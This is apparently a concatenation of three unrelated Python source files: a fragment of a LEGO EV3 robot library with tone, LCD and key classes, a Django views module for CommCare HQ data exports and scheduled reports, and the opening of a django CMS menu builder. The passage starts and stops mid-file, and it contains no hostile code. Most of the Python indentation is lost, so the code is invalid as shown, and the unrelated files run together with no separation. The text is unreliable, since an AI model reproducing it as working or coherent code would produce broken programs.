volume={'read_only': False, 'property_type': Ev3IntType}
)
class Tone(Ev3Dev):
def __init__(self):
        super(Tone, self).__init__()
self.sys_path = '/sys/devices/platform/snd-legoev3'
def play(self, frequency, milliseconds=1000):
self.tone = '%d %d' % (frequency, milliseconds)
def stop(self):
self.tone = '0'
class Lcd(object):
def __init__(self):
try:
from PIL import Image, ImageDraw
SCREEN_WIDTH = 178
SCREEN_HEIGHT = 128
HW_MEM_WIDTH = int((SCREEN_WIDTH + 31) / 32) * 4
SCREEN_MEM_WIDTH = int((SCREEN_WIDTH + 7) / 8)
LCD_BUFFER_LENGTH = SCREEN_MEM_WIDTH * SCREEN_HEIGHT
LCD_HW_BUFFER_LENGTH = HW_MEM_WIDTH * SCREEN_HEIGHT
self._buffer = Image.new(
"1", (HW_MEM_WIDTH * 8, SCREEN_HEIGHT), "white")
self._draw = ImageDraw.Draw(self._buffer)
except ImportError:
raise NoSuchLibraryError('PIL')
def update(self):
f = os.open('/dev/fb0', os.O_RDWR)
os.write(f, self._buffer.tobytes("raw", "1;IR"))
os.close(f)
@property
def buffer(self):
return self._buffer
@property
def draw(self):
return self._draw
def reset(self):
self._draw.rectangle(
(0, 0) + self._buffer.size, outline='white', fill='white')
class attach_ev3_keys(object):
def __init__(self, **kwargs):
self.kwargs = kwargs
def __call__(self, cls):
key_const = {}
for key_name, key_code in self.kwargs.items():
def attach_key(key_name, key_code):
def fget(self):
buf = self.polling()
return self.test_bit(key_code, buf)
return property(fget)
setattr(cls, key_name, attach_key(key_name, key_code))
key_const[key_name.upper()] = key_code
setattr(cls, 'CODE', Enum(**key_const))
return cls
import array
import fcntl
@attach_ev3_keys(
up=103,
down=108,
left=105,
right=106,
enter=28,
backspace=14
)
class Key(object):
def __init__(self):
pass
def EVIOCGKEY(self, length):
return 2 << (14 + 8 + 8) | length << (8 + 8) | ord('E') << 8 | 0x18
def test_bit(self, bit, bytes):
# bit in bytes is 1 when released and 0 when pressed
return not bool(bytes[int(bit / 8)] & 1 << bit % 8)
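    # Example: for the 'enter' key (code 28) this inspects
    # bytes[28 / 8] == bytes[3] against mask 1 << (28 % 8) == 0x10 and, per
    # the comment above, returns True while the key is pressed (bit == 0).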
def polling(self):
KEY_MAX = 0x2ff
BUF_LEN = int((KEY_MAX + 7) / 8)
buf = array.array('B', [0] * BUF_LEN)
with open('/dev/input/by-path/platform-gpio-keys.0-event', 'r') as fd:
ret = fcntl.ioctl(fd, self.EVIOCGKEY(len(buf)), buf)
if (ret < 0):
return None
else:
return buf
|
|
import os
import json
import tempfile
import re
from datetime import datetime, timedelta, date
from urllib2 import URLError
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.decorators import permission_required
from django.core.cache import cache
from django.core.servers.basehttp import FileWrapper
from django.core.urlresolvers import reverse
from django.http import (HttpResponseRedirect, HttpResponse,
HttpResponseBadRequest, Http404, HttpResponseForbidden)
from django.shortcuts import render
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.views.decorators.http import (require_http_methods,
require_POST, require_GET)
from casexml.apps.case.models import CommCareCase
from casexml.apps.case.templatetags.case_tags import case_inline_display
from couchdbkit.exceptions import ResourceNotFound
from casexml.apps.case.xml import V2
from corehq.apps.reports.exportfilters import default_form_filter
import couchexport
from couchexport import views as couchexport_views
from couchexport.export import SchemaMismatchException
from couchexport.export import UnsupportedExportFormat
from couchexport.models import Format, FakeSavedExportSchema, SavedBasicExport
from couchexport.shortcuts import (export_data_shared, export_raw_data,
export_response)
from couchexport.tasks import rebuild_schemas
from couchexport.util import SerializableFunction
import couchforms.views as couchforms_views
from couchforms.filters import instances
from couchforms.models import XFormInstance, doc_types
from couchforms.templatetags.xform_tags import render_form
from dimagi.utils.chunked import chunked
from dimagi.utils.couch.bulk import wrapped_docs
from dimagi.utils.couch.loosechange import parse_date
from dimagi.utils.decorators.datespan import datespan_in_request
from dimagi.utils.export import WorkBook
from dimagi.utils.parsing import json_format_datetime, string_to_boolean
from dimagi.utils.web import json_request, json_response
from fields import FilterUsersField
from soil import DownloadBase
from soil.tasks import prepare_download
from corehq.apps.domain.decorators import (login_and_domain_required,
login_or_digest)
from corehq.apps.export.custom_export_helpers import CustomExportHelper
from corehq.apps.groups.models import Group
from corehq.apps.hqcase.export import export_cases_and_referrals
from corehq.apps.reports.dispatcher import ProjectReportDispatcher
from corehq.apps.reports.models import ReportConfig, ReportNotification
from corehq.apps.reports.standard.cases.basic import CaseListReport
from corehq.apps.reports.tasks import create_metadata_export
from corehq.apps.reports import util
from corehq.apps.reports.util import get_all_users_by_domain
from corehq.apps.reports.standard import inspect, export, ProjectReport
from corehq.apps.reports.export import (ApplicationBulkExportHelper,
CustomBulkExportHelper, save_metadata_export_to_tempfile)
from corehq.apps.users.decorators import require_permission
from corehq.apps.users.export import export_users
from corehq.apps.users.models import CommCareUser
from corehq.apps.users.models import Permissions
DATE_FORMAT = "%Y-%m-%d"
datespan_default = datespan_in_request(
from_param="startdate",
to_param="enddate",
default_days=7,
)
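# With the decorator above, a report URL can pin the range explicitly, e.g.
# ?startdate=2013-01-01&enddate=2013-01-07 (illustrative dates); without the
# parameters the datespan defaults to the last 7 days.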
require_form_export_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.export.ExcelExportReport', login_decorator=None)
require_case_export_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.export.CaseExportReport', login_decorator=None)
require_form_view_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.inspect.SubmitHistory', login_decorator=None)
require_case_view_permission = require_permission(Permissions.view_report, 'corehq.apps.reports.standard.cases.basic.CaseListReport', login_decorator=None)
require_can_view_all_reports = require_permission(Permissions.view_reports)
@login_and_domain_required
def default(request, domain):
return HttpResponseRedirect(reverse(saved_reports, args=[domain]))
@login_and_domain_required
def old_saved_reports(request, domain):
return default(request, domain)
@login_and_domain_required
def saved_reports(request, domain, template="reports/reports_home.html"):
user = request.couch_user
if not (request.couch_user.can_view_reports() or request.couch_user.get_viewable_reports()):
raise Http404
configs = ReportConfig.by_domain_and_owner(domain, user._id)
def _is_valid(rn):
# the _id check is for weird bugs we've seen in the wild that look like
# oddities in couch.
return hasattr(rn, "_id") and rn._id and (not hasattr(rn, 'report_slug') or rn.report_slug != 'admin_domains')
scheduled_reports = [rn for rn in ReportNotification.by_domain_and_owner(domain, user._id) if _is_valid(rn)]
scheduled_reports = sorted(scheduled_reports, key=lambda rn: rn.configs[0].name)
context = dict(
couch_user=request.couch_user,
domain=domain,
configs=configs,
scheduled_reports=scheduled_reports,
report=dict(
title=_("My Saved Reports"),
show=user.can_view_reports() or user.get_viewable_reports(),
slug=None,
is_async=True,
section_name=ProjectReport.section_name,
),
)
if request.couch_user:
util.set_report_announcements_for_user(request, user)
return render(request, template, context)
@login_or_digest
@require_form_export_permission
@datespan_default
@require_GET
def export_data(req, domain):
"""
Download all data for a couchdbkit model
"""
try:
export_tag = json.loads(req.GET.get("export_tag", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
group, users = util.get_group_params(domain, **json_request(req.GET))
include_errors = string_to_boolean(req.GET.get("include_errors", False))
kwargs = {"format": req.GET.get("format", Format.XLS_2007),
"previous_export_id": req.GET.get("previous_export", None),
"filename": export_tag,
"use_cache": string_to_boolean(req.GET.get("use_cache", "True")),
"max_column_size": int(req.GET.get("max_column_size", 2000)),
"separator": req.GET.get("separator", "|")}
user_filter, _ = FilterUsersField.get_user_filter(req)
if user_filter:
users_matching_filter = map(lambda x: x.get('user_id'),
get_all_users_by_domain(domain, user_filter=user_filter, simplified=True))
def _ufilter(user):
try:
return user['form']['meta']['userID'] in users_matching_filter
except KeyError:
return False
filter = _ufilter
else:
filter = SerializableFunction(util.group_filter, group=group)
errors_filter = instances if not include_errors else None
kwargs['filter'] = couchexport.util.intersect_functions(filter, errors_filter)
if kwargs['format'] == 'raw':
resp = export_raw_data([domain, export_tag], filename=export_tag)
else:
try:
            resp = export_data_shared([domain, export_tag], **kwargs)
except UnsupportedExportFormat as e:
return HttpResponseBadRequest(e)
if resp:
return resp
else:
messages.error(req, "Sorry, there was no data found for the tag '%s'." % export_tag)
next = req.GET.get("next", "")
if not next:
next = export.ExcelExportReport.get_url(domain=domain)
return HttpResponseRedirect(next)
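# A minimal sketch of the query string export_data parses above. Illustrative
# only: the sample export tag is hypothetical and the helper is never called.
def _example_export_data_url(domain):
    from django.utils.http import urlencode
    params = {
        "export_tag": json.dumps([domain, "http://example.com/sample-xmlns"]),
        "format": Format.XLS_2007,
        "use_cache": "true",
        "max_column_size": 2000,
    }
    return "%s?%s" % (reverse(export_data, args=[domain]), urlencode(params))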
@require_form_export_permission
@login_and_domain_required
@datespan_default
@require_GET
def export_data_async(request, domain):
"""
Download all data for a couchdbkit model
"""
try:
export_tag = json.loads(request.GET.get("export_tag", "null") or "null")
export_type = request.GET.get("type", "form")
except ValueError:
return HttpResponseBadRequest()
assert(export_tag[0] == domain)
filter = util.create_export_filter(request, domain, export_type=export_type)
return couchexport_views.export_data_async(request, filter=filter, type=export_type)
@login_or_digest
@datespan_default
@require_GET
def export_default_or_custom_data(request, domain, export_id=None, bulk_export=False):
"""
Export data from a saved export schema
"""
deid = request.GET.get('deid') == 'true'
if deid:
return _export_deid(request, domain, export_id, bulk_export=bulk_export)
else:
return _export_no_deid(request, domain, export_id, bulk_export=bulk_export)
@require_permission('view_report', 'corehq.apps.reports.standard.export.DeidExportReport', login_decorator=None)
def _export_deid(request, domain, export_id=None, bulk_export=False):
return _export_default_or_custom_data(request, domain, export_id, bulk_export=bulk_export, safe_only=True)
@require_form_export_permission
def _export_no_deid(request, domain, export_id=None, bulk_export=False):
return _export_default_or_custom_data(request, domain, export_id, bulk_export=bulk_export)
def _export_default_or_custom_data(request, domain, export_id=None, bulk_export=False, safe_only=False):
async = request.GET.get('async') == 'true'
next = request.GET.get("next", "")
format = request.GET.get("format", "")
export_type = request.GET.get("type", "form")
previous_export_id = request.GET.get("previous_export", None)
filename = request.GET.get("filename", None)
max_column_size = int(request.GET.get("max_column_size", 2000))
filter = util.create_export_filter(request, domain, export_type=export_type)
if bulk_export:
try:
is_custom = json.loads(request.GET.get("is_custom", "false"))
export_tags = json.loads(request.GET.get("export_tags", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
export_helper = (CustomBulkExportHelper if is_custom else ApplicationBulkExportHelper)(
domain=domain,
safe_only=safe_only
)
return export_helper.prepare_export(export_tags, filter)
elif export_id:
# this is a custom export
try:
export_object = CustomExportHelper.make(request, export_type, domain, export_id).custom_export
if safe_only and not export_object.is_safe:
return HttpResponseForbidden()
except ResourceNotFound:
raise Http404()
elif safe_only:
return HttpResponseForbidden()
else:
if not async:
# this function doesn't support synchronous export without a custom export object
# if we ever want that (i.e. for HTML Preview) then we just need to give
# FakeSavedExportSchema a download_data function (called below)
return HttpResponseBadRequest()
try:
export_tag = json.loads(request.GET.get("export_tag", "null") or "null")
except ValueError:
return HttpResponseBadRequest()
assert(export_tag[0] == domain)
# hack - also filter instances here rather than mess too much with trying to make this
# look more like a FormExportSchema
if export_type == 'form':
filter &= SerializableFunction(instances)
export_object = FakeSavedExportSchema(index=export_tag)
if export_type == 'form':
_filter = filter
filter = SerializableFunction(default_form_filter, filter=_filter)
if not filename:
filename = export_object.name
filename += ' ' + date.today().isoformat()
if async:
return export_object.export_data_async(
filter=filter,
filename=filename,
previous_export_id=previous_export_id,
format=format,
max_column_size=max_column_size,
)
else:
if not next:
next = export.ExcelExportReport.get_url(domain=domain)
try:
resp = export_object.download_data(format, filter=filter)
except SchemaMismatchException, e:
rebuild_schemas.delay(export_object.index)
messages.error(
request,
"Sorry, the export failed for %s, please try again later" \
% export_object.name
)
return HttpResponseRedirect(next)
if resp:
return resp
else:
messages.error(request, "Sorry, there was no data found for the tag '%s'." % export_object.name)
return HttpResponseRedirect(next)
@login_or_digest
@require_form_export_permission
@require_GET
def hq_download_saved_export(req, domain, export_id):
export = SavedBasicExport.get(export_id)
# quasi-security hack: the first key of the index is always assumed
# to be the domain
assert domain == export.configuration.index[0]
return couchexport_views.download_saved_export(req, export_id)
@login_or_digest
@require_form_export_permission
@require_GET
def export_all_form_metadata(req, domain):
"""
Export metadata for _all_ forms in a domain.
"""
format = req.GET.get("format", Format.XLS_2007)
tmp_path = save_metadata_export_to_tempfile(domain)
return export_response(open(tmp_path), format, "%s_forms" % domain)
@login_or_digest
@require_form_export_permission
@require_GET
@datespan_in_request(from_param="startdate", to_param="enddate")
def export_all_form_metadata_async(req, domain):
datespan = req.datespan if req.GET.get("startdate") and req.GET.get("enddate") else None
group_id = req.GET.get("group")
ufilter = FilterUsersField.get_user_filter(req)[0]
users = list(util.get_all_users_by_domain(domain=domain, group=group_id, user_filter=ufilter, simplified=True))
user_ids = filter(None, [u["user_id"] for u in users])
format = req.GET.get("format", Format.XLS_2007)
filename = "%s_forms" % domain
download = DownloadBase()
download.set_task(create_metadata_export.delay(
download.download_id,
domain,
format=format,
filename=filename,
datespan=datespan,
user_ids=user_ids,
))
return download.get_start_response()
def touch_saved_reports_views(user, domain):
"""
Hit the saved reports views so stale=update_after doesn't cause the user to
see old or deleted data after a change when they next load the reports
homepage.
"""
ReportConfig.by_domain_and_owner(domain, user._id, limit=1, stale=False)
ReportNotification.by_domain_and_owner(domain, user._id, limit=1, stale=False)
@login_and_domain_required
@require_POST
def add_config(request, domain=None):
# todo: refactor this into a django form
from datetime import datetime
user_id = request.couch_user._id
POST = json.loads(request.raw_post_data)
if 'name' not in POST or not POST['name']:
return HttpResponseBadRequest()
user_configs = ReportConfig.by_domain_and_owner(domain, user_id)
if not POST.get('_id') and POST['name'] in [c.name for c in user_configs]:
return HttpResponseBadRequest()
to_date = lambda s: datetime.strptime(s, '%Y-%m-%d').date() if s else s
try:
POST['start_date'] = to_date(POST['start_date'])
POST['end_date'] = to_date(POST['end_date'])
except ValueError:
# invalidly formatted date input
return HttpResponseBadRequest()
date_range = POST.get('date_range')
if date_range == 'last7':
POST['days'] = 7
elif date_range == 'last30':
POST['days'] = 30
elif POST.get('days'):
POST['days'] = int(POST['days'])
exclude_filters = ['startdate', 'enddate']
for field in exclude_filters:
POST['filters'].pop(field, None)
config = ReportConfig.get_or_create(POST.get('_id', None))
if config.owner_id:
# in case a user maliciously tries to edit another user's config
assert config.owner_id == user_id
else:
config.domain = domain
config.owner_id = user_id
for field in config.properties().keys():
if field in POST:
setattr(config, field, POST[field])
    if POST.get('days') or date_range == 'lastmonth': # remove start and end date when a relative range ("last xx days" or "lastmonth") is used
if "start_date" in config:
delattr(config, "start_date")
if "end_date" in config:
delattr(config, "end_date")
config.save()
touch_saved_reports_views(request.couch_user, domain)
return json_response(config)
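# A minimal sketch of the JSON body add_config expects, inferred from the
# parsing above; field values are hypothetical and the helper is never called.
def _example_add_config_payload():
    return json.dumps({
        'name': 'My weekly submissions',  # required and unique per owner
        'start_date': '2013-01-01',       # parsed with %Y-%m-%d, may be null
        'end_date': '2013-01-31',
        'date_range': 'last7',            # mapped to days=7 above
        'filters': {},                    # startdate/enddate keys are stripped
    })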
@login_and_domain_required
@datespan_default
def email_report(request, domain, report_slug, report_type=ProjectReportDispatcher.prefix):
from dimagi.utils.django.email import send_HTML_email
from forms import EmailReportForm
user_id = request.couch_user._id
form = EmailReportForm(request.GET)
if not form.is_valid():
return HttpResponseBadRequest()
config = ReportConfig()
# see ReportConfig.query_string()
object.__setattr__(config, '_id', 'dummy')
config.name = _("Emailed report")
config.report_type = report_type
config.report_slug = report_slug
config.owner_id = user_id
config.domain = domain
config.date_range = 'range'
config.start_date = request.datespan.computed_startdate.date()
config.end_date = request.datespan.computed_enddate.date()
GET = dict(request.GET.iterlists())
exclude = ['startdate', 'enddate', 'subject', 'send_to_owner', 'notes', 'recipient_emails']
filters = {}
for field in GET:
        if field not in exclude:
filters[field] = GET.get(field)
config.filters = filters
body = _render_report_configs(request, [config],
domain,
user_id, request.couch_user,
True,
notes=form.cleaned_data['notes'])[0].content
subject = form.cleaned_data['subject'] or _("Email report from CommCare HQ")
if form.cleaned_data['send_to_owner']:
send_HTML_email(subject, request.couch_user.get_email(), body,
email_from=settings.DEFAULT_FROM_EMAIL)
if form.cleaned_data['recipient_emails']:
for recipient in form.cleaned_data['recipient_emails']:
send_HTML_email(subject, recipient, body, email_from=settings.DEFAULT_FROM_EMAIL)
return HttpResponse()
@login_and_domain_required
@require_http_methods(['DELETE'])
def delete_config(request, domain, config_id):
try:
config = ReportConfig.get(config_id)
except ResourceNotFound:
raise Http404()
config.delete()
touch_saved_reports_views(request.couch_user, domain)
return HttpResponse()
@login_and_domain_required
def edit_scheduled_report(request, domain, scheduled_report_id=None,
template="reports/edit_scheduled_report.html"):
from corehq.apps.users.models import WebUser
from corehq.apps.reports.forms import ScheduledReportForm
context = {
'form': None,
'domain': domain,
'report': {
'show': request.couch_user.can_view_reports() or request.couch_user.get_viewable_reports(),
'slug': None,
'default_url': reverse('reports_home', args=(domain,)),
'is_async': False,
'section_name': ProjectReport.section_name,
}
}
user_id = request.couch_user._id
configs = ReportConfig.by_domain_and_owner(domain, user_id)
config_choices = [(c._id, c.full_name) for c in configs if c.report and c.report.emailable]
if not config_choices:
return render(request, template, context)
web_users = WebUser.view('users/web_users_by_domain', reduce=False,
key=domain, include_docs=True).all()
web_user_emails = [u.get_email() for u in web_users]
if scheduled_report_id:
instance = ReportNotification.get(scheduled_report_id)
if instance.owner_id != user_id or instance.domain != domain:
            return HttpResponseBadRequest()
else:
instance = ReportNotification(owner_id=user_id, domain=domain,
config_ids=[], hour=8,
send_to_owner=True, recipient_emails=[])
is_new = instance.new_document
initial = instance.to_json()
initial['recipient_emails'] = ', '.join(initial['recipient_emails'])
kwargs = {'initial': initial}
args = (request.POST,) if request.method == "POST" else ()
form = ScheduledReportForm(*args, **kwargs)
form.fields['config_ids'].choices = config_choices
form.fields['recipient_emails'].choices = web_user_emails
if request.method == "POST" and form.is_valid():
for k, v in form.cleaned_data.items():
setattr(instance, k, v)
instance.save()
if is_new:
messages.success(request, "Scheduled report added!")
else:
messages.success(request, "Scheduled report updated!")
touch_saved_reports_views(request.couch_user, domain)
return HttpResponseRedirect(reverse('reports_home', args=(domain,)))
context['form'] = form
context['day_value'] = getattr(instance, "day", 1)
context['weekly_day_options'] = ReportNotification.day_choices()
context['monthly_day_options'] = [(i, i) for i in range(1, 32)]
if is_new:
context['form_action'] = "Create a new"
context['report']['title'] = "New Scheduled Report"
else:
context['form_action'] = "Edit"
context['report']['title'] = "Edit Scheduled Report"
return render(request, template, context)
@login_and_domain_required
@require_POST
def delete_scheduled_report(request, domain, scheduled_report_id):
user_id = request.couch_user._id
try:
rep = ReportNotification.get(scheduled_report_id)
except ResourceNotFound:
# was probably already deleted by a fast-clicker.
pass
else:
if user_id != rep.owner._id:
return HttpResponseBadRequest()
rep.delete()
messages.success(request, "Scheduled report deleted!")
return HttpResponseRedirect(reverse("reports_home", args=(domain,)))
@login_and_domain_required
def send_test_scheduled_report(request, domain, scheduled_report_id):
from corehq.apps.reports.tasks import send_report
from corehq.apps.users.models import CouchUser, CommCareUser, WebUser
user_id = request.couch_user._id
notification = ReportNotification.get(scheduled_report_id)
try:
user = WebUser.get_by_user_id(user_id, domain)
except CouchUser.AccountTypeError:
user = CommCareUser.get_by_user_id(user_id, domain)
try:
send_report.delay(notification._id)
except Exception, e:
import logging
logging.exception(e)
messages.error(request, "An error occured, message unable to send")
else:
messages.success(request, "Test message sent to %s" % user.get_email())
return HttpResponseRedirect(reverse("reports_home", args=(domain,)))
def get_scheduled_report_response(couch_user, domain, scheduled_report_id,
email=True, attach_excel=False):
"""
This function somewhat confusingly returns a tuple of: (response, excel_files)
If attach_excel is false, excel_files will always be an empty list.
"""
# todo: clean up this API?
from django.http import HttpRequest
request = HttpRequest()
request.couch_user = couch_user
request.user = couch_user.get_django_user()
request.domain = domain
request.couch_user.current_domain = domain
notification = ReportNotification.get(scheduled_report_id)
return _render_report_configs(request, notification.configs,
notification.domain,
notification.owner_id,
couch_user,
email, attach_excel=attach_excel)
def _render_report_configs(request, configs, domain, owner_id, couch_user, email, notes=None, attach_excel=False):
from dimagi.utils.web import get_url_base
report_outputs = []
excel_attachments = []
format = Format.from_format(request.GET.get('format') or Format.XLS_2007)
for config in configs:
content, excel_file = config.get_report_content(attach_excel=attach_excel)
if excel_file:
excel_attachments.append({
'title': config.full_name + "." + format.extension,
'file_obj': excel_file,
'mimetype': format.mimetype
})
report_outputs.append({
'title': config.full_name,
'url': config.url,
'content': content
})
date_range = config.get_date_range()
return render(request, "reports/report_email.html", {
"reports": report_outputs,
"domain": domain,
"couch_user": owner_id,
"DNS_name": get_url_base(),
"owner_name": couch_user.full_name or couch_user.get_email(),
"email": email,
"notes": notes or getattr(config, "description", ""),
"startdate": date_range["startdate"] if date_range else "",
"enddate": date_range["enddate"] if date_range else "",
}), excel_attachments
@login_and_domain_required
@permission_required("is_superuser")
def view_scheduled_report(request, domain, scheduled_report_id):
return get_scheduled_report_response(
request.couch_user, domain, scheduled_report_id, email=False
)[0]
@require_case_view_permission
@login_and_domain_required
@require_GET
def case_details(request, domain, case_id):
timezone = util.get_timezone(request.couch_user.user_id, domain)
try:
case = _get_case_or_404(domain, case_id)
except Http404:
messages.info(request, "Sorry, we couldn't find that case. If you think this is a mistake please report an issue.")
return HttpResponseRedirect(CaseListReport.get_url(domain=domain))
try:
owner_name = CommCareUser.get_by_user_id(case.owner_id, domain).raw_username
except Exception:
try:
owning_group = Group.get(case.owner_id)
owner_name = owning_group.display_name if owning_group.domain == domain else ''
except Exception:
owner_name = None
try:
username = CommCareUser.get_by_user_id(case.user_id, domain).raw_username
except Exception:
username = None
return render(request, "reports/reportdata/case_details.html", {
"domain": domain,
"case_id": case_id,
"case": case,
"username": username,
"owner_name": owner_name,
"slug": CaseListReport.slug,
"report": dict(
name=case_inline_display(case),
slug=CaseListReport.slug,
is_async=False,
),
"layout_flush_content": True,
"timezone": timezone,
"case_display_options": {
"display": request.project.get_case_display(case),
"timezone": timezone,
"get_case_url": lambda case_id: reverse(
case_details, args=[domain, case_id])
},
})
@require_case_view_permission
@login_and_domain_required
@require_GET
def case_xml(request, domain, case_id):
case = _get_case_or_404(domain, case_id)
version = request.GET.get('version', V2)
return HttpResponse(case.to_xml(version), content_type='text/xml')
def _get_case_or_404(domain, case_id):
try:
case = CommCareCase.get(case_id)
except ResourceNotFound:
case = None
if case is None or case.doc_type != "CommCareCase" or case.domain != domain:
raise Http404
return case
def generate_case_export_payload(domain, include_closed, format, group, user_filter, process=None):
"""
Returns a FileWrapper object, which only the file backend in django-soil supports
"""
status = 'all' if include_closed else 'open'
case_ids = CommCareCase.get_all_cases(domain, status=status, wrapper=lambda r: r['id'])
class stream_cases(object):
def __init__(self, all_case_ids):
self.all_case_ids = all_case_ids
def __iter__(self):
for case_ids in chunked(self.all_case_ids, 500):
for case in wrapped_docs(CommCareCase, case_ids):
yield case
def __len__(self):
return len(self.all_case_ids)
# todo deal with cached user dict here
users = get_all_users_by_domain(domain, group=group, user_filter=user_filter)
groups = Group.get_case_sharing_groups(domain)
fd, path = tempfile.mkstemp()
with os.fdopen(fd, 'wb') as file:
workbook = WorkBook(file, format)
export_cases_and_referrals(
domain,
stream_cases(case_ids),
workbook,
users=users,
groups=groups,
process=process
)
export_users(users, workbook)
workbook.close()
return FileWrapper(open(path))
@login_or_digest
@require_case_export_permission
@require_GET
def download_cases(request, domain):
include_closed = json.loads(request.GET.get('include_closed', 'false'))
try:
format = Format.from_format(request.GET.get('format') or Format.XLS_2007)
except URLError as e:
return HttpResponseBadRequest(e.reason)
group = request.GET.get('group', None)
user_filter, _ = FilterUsersField.get_user_filter(request)
async = request.GET.get('async') == 'true'
kwargs = {
'domain': domain,
'include_closed': include_closed,
'format': format,
'group': group,
'user_filter': user_filter,
}
payload_func = SerializableFunction(generate_case_export_payload, **kwargs)
content_disposition = 'attachment; filename="{domain}_data.{ext}"'.format(domain=domain, ext=format.extension)
mimetype = "%s" % format.mimetype
def generate_payload(payload_func):
if async:
download = DownloadBase()
a_task = prepare_download.delay(download.download_id, payload_func,
content_disposition, mimetype)
download.set_task(a_task)
return download.get_start_response()
else:
payload = payload_func()
response = HttpResponse(payload)
response['Content-Type'] = mimetype
response['Content-Disposition'] = content_disposition
return response
return generate_payload(payload_func)
def _get_form_context(request, domain, instance_id):
timezone = util.get_timezone(request.couch_user.user_id, domain)
instance = _get_form_or_404(instance_id)
try:
assert domain == instance.domain
except AssertionError:
raise Http404()
display = request.project.get_form_display(instance)
context = {
"domain": domain,
"display": display,
"timezone": timezone,
"instance": instance
}
context['form_render_options'] = context
return context
def _get_form_or_404(id):
# maybe this should be a more general utility a-la-django's get_object_or_404
try:
xform_json = XFormInstance.get_db().get(id)
except ResourceNotFound:
raise Http404()
doc_type = doc_types().get(xform_json.get('doc_type'))
if not doc_type:
raise Http404()
return doc_type.wrap(xform_json)
@require_form_view_permission
@login_and_domain_required
@require_GET
def form_data(request, domain, instance_id):
context = _get_form_context(request, domain, instance_id)
try:
form_name = context['instance'].form["@name"]
except KeyError:
form_name = "Untitled Form"
context.update({
"slug": inspect.SubmitHistory.slug,
"form_name": form_name,
"form_received_on": context['instance'].received_on
})
return render(request, "reports/reportdata/form_data.html", context)
@require_form_view_permission
@login_and_domain_required
@require_GET
def case_form_data(request, domain, case_id, xform_id):
context = _get_form_context(request, domain, xform_id)
context['case_id'] = case_id
#todo: additional formatting options
#todo: sanity check that xform_id has case_block
return HttpResponse(render_form(
context['instance'], domain, options=context))
@require_form_view_permission
@login_and_domain_required
@require_GET
def download_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert(domain == instance.domain)
return couchforms_views.download_form(request, instance_id)
@login_or_digest
@require_form_view_permission
@require_GET
def download_attachment(request, domain, instance_id):
attachment = request.GET.get('attachment', False)
if not attachment:
return HttpResponseBadRequest("Invalid attachment.")
instance = _get_form_or_404(instance_id)
assert(domain == instance.domain)
return couchforms_views.download_attachment(request, instance_id, attachment)
@require_form_view_permission
@require_permission(Permissions.edit_data)
@require_POST
def archive_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert instance.domain == domain
if instance.doc_type == "XFormInstance":
instance.archive(user=request.couch_user._id)
notif_msg = _("Form was successfully archived.")
elif instance.doc_type == "XFormArchived":
notif_msg = _("Form was already archived.")
else:
notif_msg = _("Can't archive documents of type %s. How did you get here??") % instance.doc_type
params = {
"notif": notif_msg,
"undo": _("Undo"),
"url": reverse('unarchive_form', args=[domain, instance_id]),
"id": "restore-%s" % instance_id
}
msg_template = """{notif} <a href="javascript:document.getElementById('{id}').submit();">{undo}</a>
<form id="{id}" action="{url}" method="POST"></form>""" if instance.doc_type == "XFormArchived" else '%(notif)s'
msg = msg_template.format(**params)
messages.success(request, mark_safe(msg), extra_tags='html')
redirect = request.META.get('HTTP_REFERER')
if not redirect:
redirect = inspect.SubmitHistory.get_url(domain)
# check if referring URL was a case detail view, then make sure
# the case still exists before redirecting.
template = reverse('case_details', args=[domain, 'fake_case_id'])
template = template.replace('fake_case_id', '([^/]*)')
case_id = re.findall(template, redirect)
if case_id:
try:
case = CommCareCase.get(case_id[0])
if case._doc['doc_type'] == 'CommCareCase-Deleted':
raise ResourceNotFound
except ResourceNotFound:
redirect = reverse('project_report_dispatcher', args=[domain, 'case_list'])
return HttpResponseRedirect(redirect)
@require_form_view_permission
@require_permission(Permissions.edit_data)
def unarchive_form(request, domain, instance_id):
instance = _get_form_or_404(instance_id)
assert instance.domain == domain
if instance.doc_type == "XFormArchived":
instance.unarchive(user=request.couch_user._id)
else:
assert instance.doc_type == "XFormInstance"
messages.success(request, _("Form was successfully restored."))
redirect = request.META.get('HTTP_REFERER')
if not redirect:
redirect = reverse('render_form_data', args=[domain, instance_id])
return HttpResponseRedirect(redirect)
# Weekly submissions by xmlns
def mk_date_range(start=None, end=None, ago=timedelta(days=7), iso=False):
if isinstance(end, basestring):
end = parse_date(end)
if isinstance(start, basestring):
start = parse_date(start)
if not end:
end = datetime.utcnow()
if not start:
start = end - ago
if iso:
return json_format_datetime(start), json_format_datetime(end)
else:
return start, end
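# Illustrative usage of mk_date_range; assumes parse_date accepts ISO date
# strings. The helper is never called.
def _example_mk_date_range():
    # Default: the seven days ending now, as datetimes.
    start, end = mk_date_range()
    assert end - start == timedelta(days=7)
    # String bounds are parsed; iso=True returns JSON-formatted strings.
    return mk_date_range("2013-01-01", "2013-02-01", iso=True)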
@login_and_domain_required
@permission_required("is_superuser")
def clear_report_caches(request, domain):
print "CLEARING CACHE FOR DOMAIN", domain
print "ALL CACHES", cache.all()
return HttpResponse("TESTING")
# -*- coding: utf-8 -*-
from logging import getLogger
from cms.utils import get_cms_setting
from cms.utils.django_load import load
from django.conf import settings
from django.contrib.sites.models import Site
from django.core.cache import cache
from django.core.urlresolvers import NoReverseMatch
from django.utils.translation import get_language
from menus.exceptions import NamespaceAllreadyRegistered
from menus.models import CacheKey
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
import copy
logger = getLogger('menus')
def _build_nodes_inner_for_one_menu(nodes, menu_class_name):
'''
This is an easier to test "inner loop" building the menu tree structure
for one menu (one language, one site)
'''
done_nodes = {} # Dict of node.id:Node
final_nodes = []
# This is to prevent infinite loops - we need to compare the number of
# times we see a specific node to "something", and for the time being,
# it's the total number of nodes
list_total_length = len(nodes)
while nodes:
# For when the node has a parent_id but we haven't seen it yet.
# We must not append it to the final list in this case!
should_add_to_final_list = True
node = nodes.pop(0)
# Increment the "seen" counter for this specific node.
node._counter = getattr(node,'_counter',0) + 1
# Implicit namespacing by menu.__name__
if not node.namespace:
node.namespace = menu_class_name
if node.namespace not in done_nodes:
